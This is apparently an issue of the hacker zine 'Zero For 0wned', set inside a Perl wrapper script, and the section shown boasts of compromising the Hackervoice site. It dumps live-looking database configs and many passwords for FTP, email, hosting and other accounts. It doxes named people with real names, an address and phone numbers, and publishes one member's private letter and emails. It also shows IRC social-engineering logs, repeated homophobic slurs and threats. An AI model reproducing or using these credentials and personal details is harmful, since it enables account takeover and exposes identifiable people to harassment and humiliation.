Copy Link
Add to Bookmark
Report
Zero For 0wned 03
#!/usr/bin/perl
print <<'EOART';
::::::::::::: #######;; ::::::::::::::::::::::::::::
:::::::::::::: #+; :::::::::::::-' `-::::::
::::::::::::: #;+___ _________ ::' `::::
::::::::::: #;+ / _ \/ ___/ __ \:' /( /V\ )\ `::
:::::::::: #++ / __/ / / /_/ / / v ___ v \ `:
::::::::: #+# \___/_/ \____/: | __l | :
::::::: ######### ;;;;;;;;; ::: | ___l | :
::::::::::: #+; ::::: \ __ __ / ,:
::::::::::::::: #;+ ____ :_____ \M/ V \M/ ,::
:::::::::::::: ##;;+;;# / __ \/ ___/ ,::::
::::::::::::: #++ / /_/ / / :`-... ...-:::::
:::::::::::: #+# \____/_/ :::`. -':::::
::::::::::: ### ;;;;;;; ::::::::::`. -'::::::
::::::::::::: #+; ;+; :::::::::::`. -':::::::
::::::::::::: #;+ +;+ ::::::::::::`. -':::__:::
:::::::::::: #;+ +;+ _ ______ ___ ____/ /:::
::::::::::: #++ +#+ | | /| / / __ \/ _ \/ __ /::::
:::::::::: #+# #+# | |/ |/ / / / / __/ /_/ /:::::
::::::::: ####### |__/|__/_/ /_/\___/\__,_/::::::
"Your friendly internet superheroes"
S y m a n t i c T h r e a t C o n
----------------------------------
| Level 4: Extreme |
| (/////////////////////////////4) |
-------------------------------^--
EOART
1; say('Intro');
2; own('Hackervoice');
3; say('P64');
4; own('Cypherxero');
5; say('ZAP');
6; own('Whitedust');
7; say('Unmaskunmask');
8; own('Clpwn');
9; say('Interlude');
10; own('Mil');
11; say('Scene');
12; own('Bambenek');
13; say('CF0');
14; own('Hellboundhackers');
15; say('Contact_outro');
sub Intro { ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; my $self = shift; say($self, <<'EOINTRO'
We, the masked crusaders of ZF0, have again returned from the depths of
the hackcave to bring justice to some and hope to many. We do the work
that civil society is not prepared to do, and in doing so we transcend law
and social norms. We're here to keep the internet safe from cretins,
knaves, noobs and whitehats.
Much has changed behind the production that is ZF0. Some of this has been
within our control and some has not. However, we feel that this edition
features a noticable increase in the quality of our material. We have
invested more time into our articles, as opposed to our previous pattern
of essentially dumping past hacks. Additionally we have compromised in
part with criticisms about what data we publish and how, while still
maintaining the originality and integrity of our zine.
We have arranged the articles in a way that the second half of them
generally complement the first. In this way your reading pleasure can be
easily split into two events. As well, ZF03 is self-extracting.
Some of the highlights include our owning of Whitedust et al. in response
to our own Call For 0wning, and our thorough owning of HellBound Hackers.
With HBH we owned any wankers worth laughing at and then we owned some
more. It is a massive article; for that reason alone we placed by the end.
This issue is dedicated to fallen comrades.
EOINTRO
);}
sub own {
my $pain = "Give me write perms, HAL";
my $dir = 'own';
mkdir $dir, 0700 or die $pain if !-d $dir;
&{$_[0]} && return if !$_[1];
open $OWN, '>', "$dir/$_[0].txt" or die $pain;
print $OWN $_[1];
close $OWN;
}
sub say { &own; }
sub Hackervoice { ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; my $self = shift; own($self, <<'EOHACKERVOICE'
I first looked up this site in the hunt for the ever media whoring 'psg'.
What I found pissed me off enough to take the decision to own it.
'Bringing new life to the UK scene'? The UK scene doesn't need fags like
you. You claim to be hackers, you even think you're the leetest things
since bread came sliced. Well here's a news flash, your site sucks, your
content sucks and receiving RSS feeds of milw0rm doesn't make you a
hacker. Your severe lack of respect, intelligence and arrogance has
brought you here, and will more than likely bring you here again. I have
no doubt you won't learn your lesson, after all, we're just the kiddies
who can't code and ./wget milw0rm aren't we? fags. As a side note: any
site allowing psg to spout his media whoring bullshit must be owned,
cDcnsf - Bite me.
##oh noes
DO NOT ATTEMPT TO RUN ANY FORM OF EXPLOIT CODE ON THESE FORUMS. These
forums are maintained by seasoned veteran hackers and we make sure all our
software is fully patched. No matter what exploit you have, we have
patched it and not only will you make a fool of yourself, your account
will immediately be closed and WE WILL HUNT YOU DOWN AND MAKE YOUR LIFE
MISERABLE. Trust me, it is not worth it.
#ph33r
Hacker Voice SSH/FTP
username: u38618710
password: kGKVCn2X
##changed since rm##
HV Blog:
Username: 10nix
Password: 12ab672
http://www.hackervoice.co.uk/wordpress/wp-login.php
(forum) ##content lacking and full of noobs who dream of submitting an XSS to milw0rm##
$INFO['sql_driver'] = 'mysql';
$INFO['sql_host'] = 'db114.oneandone.co.uk';
$INFO['sql_database'] = 'db136424260';
$INFO['sql_user'] = 'dbo136424260';
$INFO['sql_pass'] = 'NSBpPtf7';
(admin panel)
$db_hostname="db194.oneandone.co.uk";
$db_username="dbo166659147";
$db_password="54MPRV9g";
$db_database="db166659147";
Oh, and what the fuck is phishnet? It stops here and it stops now? What
exactly are you going to do? What is the point in your site?
// Database^M
// Choose the database to be used^M
define('XOOPS_DB_TYPE', 'mysql');^M
// Table Prefix^M
// This prefix will be added to all new tables created to avoid
name conflict in the database. If you are unsure, just use the default
'xoops'.^M
define('XOOPS_DB_PREFIX', 'xoops');^M
^M
// Database Hostname^M
// Hostname of the database server. If you are unsure, 'localhost'
works in most cases.^M
define('XOOPS_DB_HOST', 'db590.oneandone.co.uk');^M
^M
// Database Username^M
// Your database user account on the host^M
define('XOOPS_DB_USER', 'dbo161539608');^M
^M
// Database Password^M
// Password for your database user account^M
define('XOOPS_DB_PASS', 'DcQveZrA');^M
^M
Now where to start with these fags. The admins here don't know their arse
from their elbow and want to share that with the world. First up, Belial.
Belial has been owned far too many times and doesn't even know about it.
Your forum has been backdoored for months and you haven't known, and guess
what, no one gives a fuck. Infact the only reason to release this shit is
because of your arrogance.
<@Blue_Chimp> best way to win a battle is to deny the arsehole seeking a
battle, a fight ##wrong, there was no fight, just me lulzing at your
asses##
<@Be|ia|> yeah h0no started shit they had no just reason to
<@Be|ia|> May 12 10:48:41 [camel] they're lame as fuck ##camel lulz##
<@Be|ia|> I'd find it really funny if someone pwned my email
belial@hackervoice.co.uk / coder69matrix
##that quote is almost too good, heres to the lulz Belial :]
And his forum passwords range from anything to do with cheeses really,
mind you, the constant waft of cheese he must get everytime he goes for a
piss must put cheese on the brain quite a lot.
Anyone: ./john -wordlist=cheese.dic
Who's next on the list, oh, TeaC :) I bet you where worried you'd be
missing out on your chance of f4m3.
Teac / Teacish@gmail.com - purplebins1
Name: Daniel Maine
Address:
37 Eastry Road
Erith
Kent ##shit hole
DA8 1NW
Tel: 01322 448851 Mob: 07725970371
Account Username: digitalsec.co.uk ##ROFL
Account Password: purplebins1
DigitalSec is a small company dedicated to providing
security assessments at a low cost so that you can
feel safer when you're online. ##moment please..L0Lz
FTP Settings
ftp hostname: ftp.streamline.net
(Once domain is transferred/registered ftp Hostname: ftp.digitalsec.co.uk)
ftp Username: digitalsec.co.uk
ftp Password: purplebins1
host directory: htdocs
StreamlineDial Settings
For best FTP connectivity we would suggest using our local rate (0844)
internet dial up service. Here are the settings:
Number: 0844 535 2062
Username: FREE
Password: FREE
Please note that 0844 dialup is cheaper than normal 0845 services.
Catch all E-mail Settings:
E-mail address: anything@digitalsec.co.uk
(This means literally anything@digitalsec.co.uk, ie sales@ info@ dave@
etc...)
E-mail Username: root@digitalsec.co.uk
E-mail Password: purplebins1
POP3 (incoming) Hostname: mail.digitalsec.co.uk
SMTP (outgoing) Hostname: Provided by your ISP
Account Control Panel Settings
Account Control Panel Username: digitalsec.co.uk
Account Control Panel Password: purplebins1
You can login to your control panel via our website at:
http://www.streamline.net/
Account Number: 13372392
Contract Number: 12047670
TomTom.com
E-mail address: teacish@gmail.com
Password: bluebins1 <-- what is your fascination with bins?
Beastnet.org
Username: TeaC
Password: purplebins
hackervoice blog
Username: teac
Password: e0ed645
http://www.hackervoice.co.uk/wordpress/wp-login.php
Yawn.
10nix, your up next :)
And was dat hoe i was cybering with really your bitch? her ass is no
longer 0day my friend.
Nick: 10nix
Name: Joshua DiMarco
email:hyjnx01@gmail.com/ martini1337
email:joshua.a.simons@gmail.com / martini1337
Login to the Web interface@:
https://admin.1and1.com/
Customer ID: 10262299
Password: Martini1337
ftp://www.aspectsgallery.com
Login:u39828969
password: martini1337
Your VoipBuster registration details are:
Username : hackervoiceradio
Password : martini1337
voipuser.org
Username : 10nix
Password : fvxxc3sy
E-mail : 10nix@hackervoice.co.uk
Thank you for signing up. Your IPKall phone number is: 425-606-4023
SIP Phone Number: 702092
SIP Proxy: fwd.pulver.com
Email: 10nix@hackervoice.co.uk
Password: 6353
server name: old.gensortium.com
Port: 9022
username: hyjnx
passwd: switch2u
Login for asterisk is asterisk, password menhir1
Your username is 10nix, and your password is eihzibcoscx
I hope your Martini has been suffincently shaken Josh :)
h4rh4rh4r, now for some real fun. Who have i missed? SKOBY! (As skoby
reads this he probably knows what's coming, and rightly so, I won't
dissapoint skoby :).) Well I'll share it with you all, and it's FUNNY
shit. I already leaked this stuff to their shitty community when i rm'd
the site. Unfortunatly for skoby, this shit is too funny to leave for
priv8 lolz.
mrskoby@gmail.com / m47at97004a
To access UKReg simply go to http://www.ukreg.com, click on one of the
member services and enter your username and password which are as follows:
Your username is skoby
Your password is thoxogo
Username: dread-inc
Password: m47at97004a
Log in at: http://www.cjb.net/
cust num: 9754965
https://admin.1and1.co.uk
m47at97004a
ACCOUNT INFORMATION:
====================
Plan: TS-20 Package
Server IP: 70.85.87.202
Server Port: 8778
Server Address: 70.85.87.202:8778
LOGIN INFORMATION:
==================
Control Panel: http://tscp.darkstarllc.com
Username: skoby
password: m47at97004a
BILLING INFORMATION:
====================
http://billing.darkstarllc.com
Username: mrskoby@gmail.com
password: m47at97004a
_______________________________
Blackcode.com
User: mrskoby
Password: m47at97004a
Activation code: 165515647
To access your account with the Control Panel, use the following
information:
URL: https://cp.hostdone.com:8443/psoft/servlet/psoft.hsphere.CP
Login: skoby
Password: 5263929
Account ID: 4861
To access your account by FTP, use:
Host Name: web.hostdone.com
Login: skoby
Password: 5263929
## Not so funny? here you go.
Skoby -> Sarah
Sarah,
Last night when we spoke on the phone, you asked me to open up and talk to
you. I couldn't, at least not then. Knowing you now for almost two years
has been a fountain of mixed feelings, some brilliant, and some difficult.
From when i first met you in college i was crazy about you, when we first
met you told me you were single, so naturally, and arrogently, I thought
that I had a chance. Then after about i think it was 3/4 weeks, you told
me that you were going out with Fraser. I was so devistated, it was like
my heart had been ripped out of my chest and stabbed onto the desk. Once
you told me how old he was I was so fulled with rage and hatred.
The first time we went thru to see him, i had planned to kick the shit out
of him and leave him for dead. Only thing that stopped me was knowing that
it would probably severly jepordise our friendship, even end it. So that
day I bit my tounge and got thru it. Afterwords i just wanted to ask you
what the hell you were thinking, i was so discusted that you were with
THAT!
Anyways, each day went by in college, and as each day went by I started to
hurt more and more, when finally I couldn't take any more, I had only one
choice, leave college. I couldn't put up with seeing you every day, each
day I went home and i just collapsed into a sea of depression and hatred
towards him. So I broke off contact, which by the way is the most hardest
thing to do, especially when you love someone so intensly. But, i couldn't
resist contacting you again and again, because i was scared that you might
become more infatuated with Fraser, and Sarah, that's what it was,
infatuation and obsession. It was pretty obvious what he was, a discusting
pervert, and indeed we now know he is a paedophile as well. But if i said
that to you, could you have imagined what your responce would have been?!
I couldn't say that to you, I was risking any chance that we might have
together.
As we spent more time together, I started to love you more and more. Sarah
I would have done anything for you, gave you anytime you wanted. I was so
wanted to make you happy and I wanted to experiance all the wonderous and
joyous things in the world with you. Last year at the airport, wathcing
the planes come in, I really thought that day that it would be it, but you
quickly put a stop to it, and i let you aswell. I just sat there and said,
"Ok, sure no problem". What in the hell was i thinking, i should have
pushed and pushed, yet i never, feel such an idiot. Sure nothing might not
have happened, but I am so angry at myself for not even trying!
After that day, things just got worse and worse...
Anyway, cutting past more shitty feelings, and more meetings, we made
contact again last month. You told me that you had broke up with Fraser,
and you told me what you had found out about him. After you told me on the
phone i was physically sick because i never said anything in college. I
felt so incredibly bad that i was so selfish and that i only looked out
for myself and never said anything, that you ended up getting hurt so
badly, by such a monster.
Now, here is what i am so incredibly pissed off at. To start, you haved
claimed on several occasions that you have had no feelings for me, yet on
even more occasions, you have contradicted yourself. To start with,
Glasgow airport, sure it was almost an hour of pure passion and i was the
happiest guy in the world then. Why in the hell would you have been so
passionate with me if you didn't have any feelings at all?? Thats one of
the things that I do not get! Also, remember our rather lengthy
conversations last September on MSN, about the cockpit fantasies and the
such? Back then you admitted that you had feelings for me and that you
found me attractive and that you often thought about me. Its a shame i
still dont have the chat logs, could have refreshed your memory. And
another occasion, one more recent, where you admitted to me when we were
sitting by the clyde that if i made a move in college that you would have
acted on it because you said and I quote, "I really fancied you back then,
and I still do". Now i know that fancing someone and having feelings about
them are two different things Sarah, but maybe you could explain last
Tuesday for me?? We were in your living room, and we were telling each
other how we felt, eventually i couldn't take any more and i kissed you.
The look on your face was so incredible. You even said that you were happy
that I did that, whys that I wonder? And why did you keep kissing me back,
and why did you even want me to get more closer, and you know what i'm
talking about. But then the next morning i recieved an email entitled, "Uh
oh" saying that, "I have been thinking about last night, and i think it
would be best if we stayed friends until a good few months". I was so
incredibly ill and sick that day, was so unfair.
Ok, why would you want to mess with my head like that? Its pretty obvious
that you have feelings for me yet your too afraid to admit them! Sarah, i
wish you wouldn't keep messing me around, one day i'm on top of the world
because the girl that i have been so madly in love with for nearly 2 years
has finally opened up and she feels the same way, and the next day im so
incredibly heartbroken and devistated because your just throwing
everything back into my face. You have NO IDEA how hard it has been! I
have held out hope for you for so long because i loved you so much, but
now i fail to see what the point is. Sure Sarah, we can still be the best
of friends, and I could keep putting on a show, making everything seem as
if it is alright, but I cant. Its just got to the stage now where
everything that we've went thru is just destroying me, its killing me. And
another thing that hurt and angered me, last night so said on the phone
that i wasn't your type?! So what is?! 30 year old 18 stone perverted
paedophiles?!
One of the things your longing for is for someone to really love you after
you've went thru, your mum tells me how you feel. Well Sarah there is
someone out there who can truly love you, and appreciate you for how
special you really are. Sure theres probably more than one, but i doubt
you'll ever find anyone who could love you in the way that I do.
I'd just like to say these last final words. Always act on your heart, not
your head, and stop trying to analyse life and just live it.
I know i shouldn't be, but i'm still hoping that you change your mind, its
something that I cannot help, i'm only human. If you do, let me know
sooner than later. If you have any feelings, no matter how small then act
on them. If you dont, then dont email me back, i'll already know. :( And
in that case, i'll hopefully see you when i'll return from America.
Gordon
Sarah Mathieson
to Skoby
show details
6/18/05
I just want to thank you for keeping your phone on and meeting me today.
I knew i could rely on you.
Well Gordon, im not taking anymore of my so called friends letting me
down, and yes I AM angry. If its not Pamela its you.
Tomorrow is your last chance to meet me or we can just forget about
everything, i am sick and tired of being let down without notice and being
the "bad one"
I have called and called your house and there has been no response.
Call me tonight if you want to arrange to meet, if i dont hear anything
then i know where i stand.
Sarah
Skoby -> Sarah
WTF DO YOU THINK YOUR UP TO?!
First off I am not wasting my life away, IF I WAS WOULD I HAVE APPLIED TO
OVER 20 UNIVERSITES ALL OVER THE UK AND AMERICA TO STUDY FOR A PHD IN
COMPUTER SCIENCE?!
Sarah -> Skoby
No excuse me who was the one who never phoned me? i told you to leave your
phone on to contact me, i've also asked you repeatedly to phone me but i
dont know whats wrong with me.
Why didn't you tell me you weren't going to meet me? i went home early
thinking you were going to meet me.
Skoby -> Sarah
Sarah I'm going to the bridges, if you love them so much then you know
where they are, but i'm not going. And what is it with you wanting to
get a double hotel room, thats just a bit weird dont ya think?
Do me a big favour, dont contact me again and dont call the house when
I get back, if you do i'll just block incoming calls from your
numbers.
Sarah -> Skoby
Sorry? Im sorry Gordon, but the only reason i asked was because you said
yes. If you didnt want to then you shoud have said so.
Why are you mad at me?
Sarah
Sarah->Skoby
Im just a bit shocked at why you've sent me this hurtful email when on msn
you were happy to talk to me. Whats going on?
Can you explain why?
Skoby -> Sarah
I dont have to because i dont need to, nor do I want to. Just leave me
alone Sarah, ok?
Sarah -> Skoby
You wont need to block me because i wont be in contact anymore.
Sarah
Poor Skoby, not only are you an emo fag, now everyone knows that you're an
Emo fag. Get out of the scene and stay out the scene.
We need to keep sites like this off the net. And to all the members of
this site, if you feature in this zine, you know whose fault it is? Ours?
no. Belial and all the other admins i featured above have been letting you
log into a backdoored forum for a long time. I didn't even backdoor it and
managed to find it. So Skoby/Belial/TeaC i hope you're happy with your new
found fame, something which you've been after for along now, now get the
fuck out of the scene, especially you skoby.
Sites like this really do piss me off, but not as much as when I irc'd
with these people, their lack of knowledge astounds me, especially when
they think they are the bee's knees. News Flash: You fake scene whoring
pieces of shit can bite me, you're lucky I didn't release all the irc logs
of you fags.
Btw, your irc servers are owned and sniffed and also, Vesalius, your
homebox is backdoored, and I have your address.
<@Be|ia|> i mean pr0j3t g4yh4m ##oh dear, WHITEHAT.
Ok, with the main ownage over, lets check out some more IRC logs of these
noobs being owned left right and centre :)
First up, naxxtor being SE'd:
01:12:11 -!- m4tr1x [m4tr1x@thv-1D1E76BC.cpucafe.com] has joined #hvr
##MATRIX IS ME :D
01:12:56 < m4tr1x> hello
01:13:16 < naxxtor> hihi
01:13:40 <+Funsox> hi
01:14:01 < m4tr1x> i have been learning to hack
01:14:11 < m4tr1x> and found your site
01:14:19 < naxxtor> ah excellent
01:14:22 <+Funsox> Sounds good so far
01:14:38 < naxxtor> you on the forums yet m4tr1x ?
01:15:15 < m4tr1x> i didnt listen 2 ur show yet though, becos i dont want
to go over my internets cap
01:15:23 < m4tr1x> no i am not on the forums yet
01:15:32 < naxxtor> fair enough
01:15:45 < pingu> i will sign up :D
01:16:18 < naxxtor> good plan
01:16:36 < naxxtor> that way i can validate you guys now rather than you
having to wait till tomorow
01:16:43 < pingu> yay
01:17:23 < pingu> hackersvoice.co.uk?
01:17:37 < pingu> oh hackervoice
01:17:39 < m4tr1x> i want to learn to use rpcdcom hack tool
01:17:59 < naxxtor> forums.hackervoice.co.uk
01:18:07 < naxxtor> hmm, hack tool - sounds skiddyish to me! ## I THOUGHT
ID SPEAK ON YOUR LEVEL
01:18:24 < m4tr1x> http://milw0rm.com/exploits/61
01:18:28 < naxxtor> you talking about the RPC buffer overflow exploit
01:18:35 < m4tr1x> i tried putting the lines into the run box but it didnt
work ##LOL
01:18:45 < naxxtor> milw0rm.com [2003-07-21]
01:18:52 * naxxtor stifles a laugh ##I WAS ALL OUT LOLING
01:18:55 < pingu> :(
01:18:56 < naxxtor> no, that wouldn't work
01:19:05 < naxxtor> you need to compile it
01:19:50 < m4tr1x> i believe my friend can be hacked with it
01:19:56 < m4tr1x> and my school
01:20:01 <+Funsox> hmmm
01:20:13 < naxxtor> they using XP SP1?
01:20:24 < naxxtor> http://msdn.microsoft.com/vstudio/express/visualc/ <--
you'll need something like that
01:20:29 < m4tr1x> they run windows XP yes
01:20:30 < naxxtor> a C/C++ compiler
01:20:40 < naxxtor> that exploit was patched a LONG time ago
01:20:54 < pingu> what if they dont have any service packs at all?
01:21:10 < naxxtor> hmm, depends
01:21:26 < naxxtor> if they've been updating just not adding the SP's
01:21:32 < pingu> right
01:21:32 < naxxtor> which is a bit stupid really
01:21:38 < pingu> :]
01:21:46 < pingu> i see
01:22:39 < naxxtor> btw
01:22:47 * naxxtor points at the forum rules (which also apply here)
01:22:47 < naxxtor> Do not ask us to hack anything for you. We will not
tell you how to compromise your ex-girlfriend's e-mail account and we will
not do it for you. Nor will we help you deface you school's website or get
root on your school's network. If you want to do any of these type of
things then it is your own business and we don't want want to know about
it.
01:23:04 -!- Funsox [god@thv-79552261.bmly.cable.ntl.com] has quit [Ping
timeout]
01:23:05 < pingu> dont worry! :)
01:23:22 < m4tr1x> is it ok to use hack tool on hackervoice then lmfao
lmfao
01:23:40 < naxxtor> ha haaa no
01:24:03 < naxxtor> you've not seen what we've done to the nob heads who
have done that in the past ##BRING IT ON NIG
01:24:25 < m4tr1x> :(
01:24:39 < m4tr1x> dont hack me
01:24:41 < pingu> may i ask what you did?
01:24:48 < naxxtor> you may ask
01:24:57 < pingu> what did you do? :b
01:25:00 < naxxtor> but i probably won't give a satisfactory answer
01:25:11 < naxxtor> we caused them greif #SHIT
01:25:13 < pingu> oh okay
01:25:19 < pingu> fair enough
01:26:28 < m4tr1x> i did php exploit on a website once
01:26:32 < m4tr1x> from milw0rm
01:26:39 < m4tr1x> do you know how to hack google
01:26:42 < m4tr1x> i read how to
01:30:11 < naxxtor> hack google?
01:30:19 < m4tr1x> you do it like this
01:30:22 < m4tr1x> inurl
01:30:24 < m4tr1x> and stuff
01:30:33 < naxxtor> are you talking about google hacking
01:30:34 < m4tr1x> you can even find mp3's using it
01:30:38 < m4tr1x> hacking google
01:31:06 < naxxtor> ohh yeah
01:31:18 < naxxtor> that's not really hacking google
01:31:27 < naxxtor> well, i guess it is a sort of hack ##YEAH!
01:31:59 < m4tr1x> could you hack me naxxtor
01:32:13 < naxxtor> i don't know :p ## NO
01:32:23 < naxxtor> i don't particularly want to try
01:32:30 < naxxtor> well...
01:32:34 < naxxtor> i can do this ....
01:32:40 -!- m4tr1x [m4tr1x@thv-1D1E76BC.cpucafe.com] has left #hvr [Left
all channels]
01:32:43 < naxxtor> :p
01:32:45 < pingu> hahaa
01:32:51 -!- m4tr1x [m4tr1x@thv-1D1E76BC.cpucafe.com] has joined #hvr
[00:33] <naxxtor> i don't even need to force him :p
[00:33] <naxxtor> as you can see
[00:33] <naxxtor> that usually makes people part all the channels they're
currently on
[00:33] <m4tr1x> did you think of that
[00:33] <m4tr1x> i just put #0,0 in milworm search
[00:33] <naxxtor> kinda #hrm..
[00:33] <m4tr1x> no results
[00:34] <naxxtor> it's not really an exploit
[00:34] <naxxtor> it's just a quirk in the way most IRC clients work
[00:34] <pingu> thats stupid
[00:34] <naxxtor> yeah, it is :p
[00:34] <pingu> why dont the developers of the clients fix that?
[00:34] <m4tr1x> i think i saw that happen on the film swordfish ## LOL
[00:34] <m4tr1x> a guys got all his internet explorers closed or something
[00:34] <naxxtor> ....... i didn't know they used IRC in swordfish
........
[00:35] <m4tr1x> i like your nickname naxxtor
[00:35] <m4tr1x> what is your password
[00:35] <naxxtor> lol
[00:35] <naxxtor> you think i have ONE password? ## right now i was so
tempted to paste his pw, but refrained for the lulz
[00:35] <naxxtor> also, you assume it's a word?
[00:36] <m4tr1x> what do you mean
[00:36] <m4tr1x> like numbers and stuff like my name
[00:36] <naxxtor> it's a bit better than that
[00:37] <naxxtor> it includes letters upper and lower case
[00:37] <naxxtor> numbers
[00:37] <naxxtor> symbols
[00:37] <naxxtor> non printable characters
[00:38] <m4tr1x> is that a printer exploit
[00:38] <naxxtor> um
[00:38] <naxxtor> ????
[00:38] <naxxtor> do you see those?
[00:39] <m4tr1x> they are rectangles
[00:39] <naxxtor> exactly
[00:39] <m4tr1x> its like on the matrix
[00:39] <naxxtor> lol
[00:39] <m4tr1x> when the things come down the screen
[00:39] <naxxtor> they've all got codes
[00:39] <m4tr1x> do you use COMMAND.COM
[00:39] <naxxtor> try holding alt and typing some numbers on the numpad
[00:39] <naxxtor> i use bash ;)
[00:40] <m4tr1x> whats bash
[00:40] * m4tr1x slaps naxxtor around a bit with a large trout
[00:40] <naxxtor> a shell
[00:40] <naxxtor> for linux
[00:41] <m4tr1x> what is linux
[00:41] <naxxtor> it's an operating system
[00:41] <naxxtor> www.debian.org
[00:41] <m4tr1x> like VISTA
[00:42] <naxxtor> yes, only way less crap
[00:42] <m4tr1x> do u use this
[00:42] <m4tr1x> debian
[00:42] <naxxtor> yep
[00:42] <m4tr1x> hahhahaha it sounds like an alien ##LOL
[00:42] <naxxtor> it does?
[00:42] <m4tr1x> BOW TO ME EVIL DEBIAN
[00:42] <naxxtor> there is a program for debian called alien
[00:43] <naxxtor> lol
[00:43] <naxxtor> debian aint evil
[00:43] * Funsox has joined #hvr
[00:43] <m4tr1x> how can i find out what debian is like
[00:43] <m4tr1x> how do i get a SHELL
[00:43] <naxxtor> let me see
[00:44] <m4tr1x> 'Windows cannot find 'BASH'
[00:44] <m4tr1x> it didnt work inthe run box
[00:44] <naxxtor> LOL no windows wouldn't
[00:44] <naxxtor> mmkay
[00:44] <naxxtor> wanna know what debian is like?
[00:45] <m4tr1x> yeah
[00:45] <naxxtor>
http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html # HERE WE
GO
[00:45] <naxxtor> download the file called putty.exe
[00:45] <m4tr1x> ok
[00:45] <m4tr1x> i hope its not spyware
[00:45] <m4tr1x> i run adaware 3 times a week you know
[00:45] <naxxtor> lol no, it's not adware
[00:46] <naxxtor> i'm running it right now
[00:46] * Funsox has quit IRC (Ping timeout)
[00:46] <m4tr1x> ok i got it
[00:46] <naxxtor> right
[00:46] <naxxtor> run it
[00:46] <m4tr1x> yes
[00:46] <naxxtor> in the box type in home.naxxtor.com
[00:46] <m4tr1x> yeah
[00:47] <naxxtor> got a black box up asking for a password?
[00:47] <m4tr1x> username:
[00:47] <naxxtor> your username is m4tr1x
[00:47] <m4tr1x> ok
[00:47] <naxxtor> check PMs for your password
##private messages
[00:47] <naxxtor> password is password ## EL8
[00:47] <m4tr1x> ok
[00:47] <m4tr1x> wait
[00:47] <m4tr1x> my mum is shouting
[00:47] <m4tr1x> brb
[00:47] <naxxtor> lol ok
[00:48] <m4tr1x> its late you see
[00:48] <m4tr1x> 00:48 here
[00:48] <m4tr1x> i might have to go
[00:48] <naxxtor> yes, it is quite
[00:48] <m4tr1x> can i coem back here
[00:48] <naxxtor> it's 00:48 here too
[00:48] <naxxtor> i don't see why not
[00:48] <m4tr1x> il leave mirc running wil those instruction work tomorrow
[00:48] <naxxtor> should do
[00:49] <naxxtor> bear in mind i'm going to be watching you very closely,
so don't try any funny stuff without telling me first
[00:49] <m4tr1x> haha are you scared my dcom exploit would work ##LOL
[00:49] <naxxtor> on that machine? lol no
[00:49] <m4tr1x> why not
[00:50] <naxxtor> because it's running linux
[00:50] <naxxtor> which doesn't have dcom at all
[00:50] <m4tr1x> oh
[00:50] <m4tr1x> il read about linux at school tomorrow at lunch
[00:50] <naxxtor> good plan
[00:50] <naxxtor> but you've got a shell to play with nos
[00:50] <naxxtor> *now
[00:50] <m4tr1x> thank you
[00:50] <naxxtor> no probs
[01:21] <m4tr1x> i am back
[01:21] <m4tr1x> i just tried the putty program
[01:21] <m4tr1x> but it says something about " DNS LOOK UP "
[01:21] <m4tr1x> and a red box
[01:23] <naxxtor> ok hang on a second
[01:23] <naxxtor> my dns is borked
[01:23] <m4tr1x> what does dns stand for
[01:23] <naxxtor> 212.159.18.135
[01:23] <naxxtor> Domain Name Server
[01:24] <m4tr1x> what are those numbers
[01:24] <naxxtor> it's an IP
[01:24] <naxxtor> it tells your computer where mine is
[01:24] <m4tr1x> oh ok
[01:24] <m4tr1x> do i put it in the box
[01:24] <m4tr1x> when i click open
[01:24] <naxxtor> yes
[01:25] <m4tr1x> thank you, anyway i gotta go now. i alraedyt had to sneak
back onto the pc
[01:25] <naxxtor> lol ok
[01:26] <m4tr1x> iv hidden putty.exe in a folder in the C:\windows area
[01:26] <naxxtor> nice hiding
[01:26] <naxxtor> if you put it in system32
[01:26] <m4tr1x> thanks
[01:26] <naxxtor> you can open the run box
[01:26] <naxxtor> and type putty
[01:26] <naxxtor> and it'll start
[01:26] <m4tr1x> il see if i can find that folder
[01:26] <m4tr1x> thank you, i will try and talk to you tomorrow
[01:26] <m4tr1x> good night
[01:26] <naxxtor> night
As you can see, naxxtor is an idiot.
Now moving on me dropping passwords in their channel..check it :D
### This is the after effects of trolling, dropping them their own pw's.
13:16 -!- l0l [l0l@thv-391E977F.offline.net] has joined #hvr
13:16 -!- Topic for #hvr: HA - CKER VOICE RADIOOOO | #brumhv..EVERYONE
LEAVE BIRMINGHAM!!! | 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 |
<naxxtor> we should have sajoin'd shaggstar and jojo into the pub |
http://stream.hackervoice.co.uk:8000/stream.mp3.m3u teh stream | <htek> i
am jealous of your life
13:16 -!- Topic set by Vesalius [] [Wed May 9 13:02:01 2007]
13:16 [Users #hvr]
13:16 [~Be|ia| ] [@muftak ] [+BOfH ] [+Katje ] [+n0x ]
[+Zakolus]
13:16 [~naxx2 ] [@oOJINxOo_] [+BOT ] [+Large ] [+psg ] [
mxn ]
13:16 [~naxxtor ] [@shaman ] [+Crypt ] [+lohapuk ] [+Seadog ]
13:16 [&SHAGGSTaRR] [@TeKitty ] [+cybereagle] [+MITKitty] [+Timboss]
13:16 [&Vesalius ] [@zinya- ] [+DesertRose] [+MuNk ] [+x4e ]
13:16 -!- Irssi: #hvr: Total of 27 nicks [5 ops, 0 halfops, 16 voices, 6
normal]
13:16 -!- Channel #hvr created Mon Feb 19 17:50:51 2007
13:16 -!- Irssi: Join to #hvr was synced in 1 secs
13:16 <+cybereagle> i thought i found his name address telephone and
email. but that was for an italian. boo :(
13:16 <@zinya-> did you ever bully anyone when you were younger psg?
13:16 -!- mode/#hvr [+v l0l] by Vesalius
13:16 <+cybereagle> oh boy
13:16 <+cybereagle> here we go
13:17 <+Large> guys i think i have worked out how to transmit teletext we
want to a whole county in the uk, but of course this is illegal and we
would not do it
13:17 <+psg> cybereagle: how do you know he isn't italian?
13:17 <+Zakolus> who the fuck is l0l?
13:17 <&Vesalius> Large, yes "we" "wouldn't"
13:17 <+cybereagle> psg: i dont for sure, but his ip was american
13:17 <+cybereagle> and i didnt wanna look an ass
13:17 <+cybereagle> :P
13:17 <+cybereagle> i could prob find out with more googling
13:18 <+cybereagle> apparently, he was known for his rants and outburts on
another community
13:18 <+l0l> Zakolus: hm?
13:18 <&Vesalius> oh noes
13:18 <+l0l> obviously some guy new to this channel
13:18 <&Vesalius> he might rm my machine
13:18 <+Zakolus> okayy..
13:18 -!- Jordan [Jordan@thv-189B68CB.bagu.broadband.ntl.com] has joined
#hvr
13:18 -!- mode/#hvr [+v Jordan] by ChanServ
13:18 <+Zakolus> hey Jordan
